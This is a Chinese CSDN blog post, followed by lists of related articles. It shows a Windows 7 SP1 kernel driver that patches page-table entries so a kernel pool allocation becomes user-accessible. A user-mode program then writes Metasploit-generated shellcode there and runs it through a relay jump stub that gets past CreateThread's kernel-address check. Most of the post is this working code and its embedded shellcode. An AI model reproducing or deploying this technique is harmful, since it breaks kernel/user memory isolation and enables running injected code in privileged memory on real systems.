Windows内核地址跑r3代码实现

最新推荐文章于 2024-08-07 13:04:47 发布
最新推荐文章于 2024-08-07 13:04:47 发布
阅读量964 收藏 1
点赞数
分类专栏: 爱好
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37353105/article/details/116307446
版权
本文探讨了一种针对Windows系统的内核内存篡改技术,通过修改页表项实现用户态读取内核内存。博客作者分享了修改内核页表的代码,并指出该方法仅适用于Win7 SP1,且在Win10 1903及更高版本中可能导致蓝屏。同时,文中提到在创建线程时不能直接使用内核地址,需要借助用户态地址作为中转。
摘要由CSDN通过智能技术生成

背景

最近在看雪上看到了一篇修改页属性的博客https://bbs.pediy.com/thread-266781.htm,之前的同事也提到过有人在r0跑dll,于是趁着这个机会把原作者的代码改了下,将申请的内核地址改成user可读,如下所示,这里有几点需要注意的

1、在win10 1903 中测试失败,蓝屏0x1a,会对pxe做检查

2、内核的pte基址是写死的

3、不支持大页

#include <Ntifs.h>
#include <ntimage.h>
#include <ntstrsafe.h>


//onlly working in win 7 sp1


#define KERNEL_CR3_OFFSET 0x28

PVOID g_UserRead = NULL;
PVOID MiGetXXXAddress(ULONG64 VirtualAddress, PVOID PteBase) {
	return ((VirtualAddress >> 9) & 0x7FFFFFFFF8) + (ULONG64)PteBase;
}

PVOID GetBase() {
	//PUCHAR BaseAddr = MmGetVirtualForPhysical;
	//return *(PUINT64)(BaseAddr + 0x22);
	//win 7
	return 0xFFFFF68000000000;
}
EXTERN_C PUCHAR PsGetProcessImageFileName( PEPROCESS Process);

VOID ProcessNotifyRoutine(_In_ HANDLE ParentId,_In_ HANDLE ProcessId,_In_ BOOLEAN Create){
	if (Create){
		PVOID tmpRead = (PVOID)((ULONG64)g_UserRead + 0x1000);
		PULONG64 PteBase = GetBase();
		PULONG64 Pte = (PULONG64)MiGetXXXAddress(g_UserRead, PteBase);
		PULONG64 Pde = (PULONG64)MiGetXXXAddress(Pte, PteBase);
		PULONG64 Ppe = (PULONG64)MiGetXXXAddress(Pde, PteBase);
		PULONG64 Pxe = (PULONG64)MiGetXXXAddress(Ppe, PteBase);


		ULONG PXEIndex = ((ULONG64)g_UserRead >> 0x27) & 0x1FF;
		ULONG PPEIndex = ((ULONG64)g_UserRead >> 0x1E) & 0x1FF;
		ULONG PDEIndex = ((ULONG64)g_UserRead >> 0x15) & 0x1FF;
		ULONG PTEIndex = ((ULONG64)g_UserRead >> 0xC) & 0x1FF;
		ULONG FuncOffset = (ULONG64)g_UserRead & 0xFFF;

		PVOID TmpAddress = MiGetXXXAddress(tmpRead, PteBase);
		ULONG64 TmpPTE = *(PULONG64)TmpAddress;

		
		//修正pte的值
		*(PULONG64)TmpAddress = *Pde;
		*(PULONG)((ULONG64)tmpRead + PTEIndex * 8) |= 4; //这里需要清楚g位
		__invlpg(tmpRead);
		//*(PULONG)((ULONG64)tmpRead + PTEIndex * 8) -= 0x100;
		//修正pde
		*(PULONG64)TmpAddress = *Ppe;
		*(PULONG)((ULONG64)tmpRead + PDEIndex * 8) |= 4;
		__invlpg(tmpRead);
		//修正ppe
		*(PULONG64)TmpAddress = *Pxe;
		*(PULONG)((ULONG64)tmpRead + PPEIndex * 8) |= 4;
		__invlpg(tmpRead);
		*(PULONG64)TmpAddress = TmpPTE;//还原




		NTSTATUS status = STATUS_SUCCESS;
		PEPROCESS Process;
		status = PsLookupProcessByProcessId(ProcessId, &Process);
		PUCHAR pFileName = PsGetProcessImageFileName(Process);
		char buf[] = "R3Worker.exe";
		if (strcmp(pFileName, buf) == 0){

			//DbgBreakPoint();
			PVOID pDirectoryTableBase = (ULONG64)Process + KERNEL_CR3_OFFSET;
			//修正pxe
			PVOID TmpAddress = MiGetXXXAddress(tmpRead, PteBase);
			ULONG64 TmpPTE = *(PULONG64)TmpAddress;
			*(PULONG64)TmpAddress = (*(PULONG64)pDirectoryTableBase) & (~0xFFF) | 0x063;
			*(PULONG)((ULONG64)tmpRead + PXEIndex * 8) |= 4;
			__invlpg(tmpRead);
			*(PULONG64)TmpAddress = TmpPTE;//还原
		}
		ObDereferenceObject(Process);
	}
}

VOID Unload(PDRIVER_OBJECT pDriverObj) {
	if(g_UserRead)
		ExFreePoolWithTag(g_UserRead, '123');
	PsSetCreateProcessNotifyRoutine(ProcessNotifyRoutine, TRUE);
	DbgPrint("See you! \n");
}

NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegPath) {
	DriverObject->DriverUnload = Unload;

	//申请一块内存然后把它user的访问置位
	g_UserRead =  ExAllocatePoolWithTag(NonPagedPool,PAGE_SIZE * 2, '123');
	if (!g_UserRead)
		return STATUS_UNSUCCESSFUL;
	PsSetCreateProcessNotifyRoutine(ProcessNotifyRoutine, FALSE);
	DbgPrint("address  0x%llX   \n", g_UserRead);
	return STATUS_SUCCESS;
}

之后在r3往申请的内存写入shellcode,但是需要注意的是在启动线程的时候不能填写内核地址,CreateThread在内核中会校验先前模式,由于是r3来的,但是传入的是一个r0的地址,当然会出错,此时就需要一个地址用来做中转,如果要自己测试需要修改申请的内核地址

#include<windows.h>
#include<stdio.h>
#include<stdlib.h>
#define _CRT_SECURE_NO_WARNINGS

int main(){


	unsigned char sc[] =
		"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
		"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
		"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
		"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
		"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
		"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
		"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
		"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
		"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
		"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
		"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
		"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
		"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
		"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
		"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
		"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
		"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
		"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
		"\x63\x2e\x65\x78\x65\x00";


	unsigned char relayBuffer[] = { "\x48\xB8\x00\xE0\x77\x02\x80\xFA\xFF\xFF\xFF\xE0\x00" };

	LPVOID relayAddress = VirtualAlloc(NULL, 0x100, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

	if (!relayAddress)
		return 0;


	PULONG64 address = 0xFFFFFA8002708000;
	__try{
		ULONG64 key = *address;
		memcpy(address, sc, 277); //sc拷贝到内核地址
		memcpy(relayAddress, relayBuffer,13);//中间跳 // mov rax xxxx  jmp rax
		memcpy((PUCHAR)relayAddress + 2, &address, 8);//修改地址为内核地址
		system("pause");
		CreateThread(NULL, NULL, relayAddress,NULL,NULL,NULL);//这里不能直接指定内核地址,有地址校验会报0xc000000d,参数错误,所以这里需要一r3地址
	}__except (EXCEPTION_EXECUTE_HANDLER) {
		printf("GetLastError %d \n", GetLastError());
	}
	system("pause");

	return 0;
}

shellcode是从msf生成的

执行之后的效果如下

被遗弃的庸才
关注
专栏目录
IoCreateNotificationEvent 同步r3和r0
爱杀之爪的矩阵
11-07 4056
r3和r0共享对象来同步
R0注入Dll到R3进程
被遗弃的庸才博客
12-14 2112
代码大部分都是CV(ctrl c+ctrl v)的(读书人的事情不能说抄是借鉴),注入参考的是Blackbone的代码,然后稍微改了改,经过测试能够分别注入x32和x64的进程,下面是代码。 原理也很简单,首先是附加到目标进程,获得目标进程的LdrLoadDll函数地址,申请地址空间构造函数call(x32和x64是分布进行构造的),之后获得ssdt表的NtCreateThreadEx启动构造的...
Windows内核技术的精华站点
温研的专栏 (探索OS内核的奥秘)
02-15 3772
Web站点: http://www.osronline.com,技术含量很高的Windows驱动开发站点,该站点的list基本上覆盖了所有Windows驱动开发的常见问题,强烈推荐; http://www.microsoft.com/whdc,微软的驱动开发资源主页,可以获取很多官方资料; http://www.wd-3.com/,该站点收集了一些比较好的Wind
【系统底层】系统调用(R3API调用过程详解)
子曰小玖的博客
10-20 1300
WindowsAPI API(Application Programming Interface),我们调用时只需提供正确的参数以及接收返回值就可以判断API执行是否成功或者通过GetLastError获得错误原因. 大部分API在R3都是处理各种校验,真正执行功能都是在R0(并不是所有的API都是在R0处理). 系统中几个核心DLL(Kernel32.dll,User32.dll,GDI32.dll,Ntdll.dll(大多数API通过此DLL进入内核)). 通过API
R3-R0 系统调用(快速调用与中断门)
walker的博客
03-03 1051
简介 我们知道,通过驱动程序可以实现从用户态进入内核态。而操作系统的 API 函数可以实现进入内核态,那么这是如何实现的呢? 操作系统定义了一个用户程序和内核程序都可以访问的一个结构 _KUSER_SHARED_DATA ,而用户态下的该结构和内核态下的该结构都指向同一个物理内存。操作系统通过初始化该结构体,以实现 API 函数直接 call 该结构体下的 SystemCall 中的函数地址( KiFastSystemCall 或 KiIntSystemCall 函数),以实现从用户态进入内核态。 _KU
r3_to_r0.rar_from ring0 ring3_ring0_windows 内核
09-24
描述 "从ring3切换到ring0的代码windows内核代码" 暗示了压缩包包含的可能是一段实现了从用户态(Ring 3)切换到内核态(Ring 0)的代码,这对于理解Windows内核的工作原理以及如何编写驱动程序至关重要。...
windows内核-调用门的实现
zhyjhacker的博客
07-02 691
调用门无参的实现提示:以下是本篇文章正文内容,下面案例可供参考一、windbg查看GDTR表,查看cs=1b即18出的描述符00cffb000000ffff5.4调用门用指令eq 修改C0处用于构建调用门,还要修改c8处的内容,从1B中复制过来,调用门要跳到C8处指向。
驱动框架、内核驱动与R3通信1
08-03
Windows内核中,驱动对象(`DRIVER_OBJECT`)是驱动程序的核心结构,它包含了驱动的基本信息和执行功能。`DRIVER_OBJECT` 结构体中包含多个字段,例如: 1. `Type` 和 `Size` 字段标识对象的类型和大小。 2. `...
windows内核-调用门的实现02
最新发布
zhyjhacker的博客
08-07 745
调用门无参的实现提示:以下是本篇文章正文内容,下面案例可供参考一、windbg查看GDTR表,查看cs=1b即18出的描述符00cffb000000ffff5.4调用门用指令eq 修改C0处用于构建调用门,还要修改c8处的内容,从1B中复制过来,调用门要跳到C8处指向1,这里如果不进行调用门的调整,指向是没法执行的,如果大家不装windbg本代码,执行汇报05从错误2,本套课程需要有汇编基础。
win10内核部分源码
11-28
瘟10 内核部分代码,win10内核部分源码,win10内核部分源码,win10内核部分源码。仅供学习,请于下载后24小时内销毁
Isometric-bedroom:用 r3f 制作的 3D 卧室
05-30
创建 React 应用程序入门 这个项目是用引导的。 可用脚本 在项目目录中,可以运行: npm start 在开发模式下运行应用程序。 打开在浏览器中查看。 如果您进行编辑,页面将重新加载。 您还将在控制台中看到任何 lint 错误。 npm test 在交互式观察模式下启动测试运行器。 有关更多信息,请参阅有关的部分。 npm run build 将用于生产的应用程序构建到build文件夹。 它在生产模式下正确地捆绑了 React 并优化了构建以获得最佳性能。 最小化内部版本,文件名包含哈希值。 您的应用程序已准备好部署! 有关更多信息,请参阅有关的部分。 npm run eject 注意:这是一种单向操作。 一旦eject ,就回不去了! 如果您对构建工具和配置选择不满意,您可以随时eject 。 此命令将从您的项目中删除单个构建依赖项。 相反,它会将所有配置文件和
获取内核地址大小路径
09-04 309
#include"ntifs.h" #include"intsafe.h" #include"ntimage.h" #define out #define in #define SystemModuleInformation 11 ULONG_PTR jizhi_neihe = 0; ULONG_PTR daxiao_neihe = 0; WCHAR *pwz_kernel_path = NULL
CPU漏洞补丁修复导致KeServiceDescriptorTable获取变更
weixin_30784501的博客
01-11 642
  一、前言   2018年元旦,出现的cpu的漏洞,可以在windows环三直接读取内核数据,windows对该漏洞提供补丁,补丁增加了一个页表,对应的内核处理也增加了,接下来我们看下补丁修复的表象以及对KeServiceDescriptorTable获取的变更。   可参考https://bbs.kafan.cn/thread-2112833-1-1.html   二、补丁修...
Windows驱动开发第10课(R3与R0通信交换数据第一节)
weixin_42655748的博客
11-28 1471
Windows内核编程之:检查内存的可用性
weixin_34025051的博客
04-14 396
这两个函数不是返回该段内存是否可读写,而是当不可读写的时候引发一个异常(Exception)。这个异常需要用到微软的编译器提供的"结构化异常"处理变法。"结构化异常"机制会轻松的检测到这种异常进而做出相应的异常处理 /************************************************************************ * 函数名称:ProbeFo...
判断内存是否可读可写
清凝
02-24 2979
判断可读 IsBadWritePtr(BufferData, BufferLength) 判断可写 IsBadReadPtr(BufferData, BufferLength) 其中BufferData为内存首地址,BufferLength为内存长度
内核重载
坦然
09-12 2918
/*++ BUILD Version: 0004 // Increment this if a change has global effects Copyright (c) Microsoft Corporation. All rights reserved. You may only use this code if you agree to the terms of the Win
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值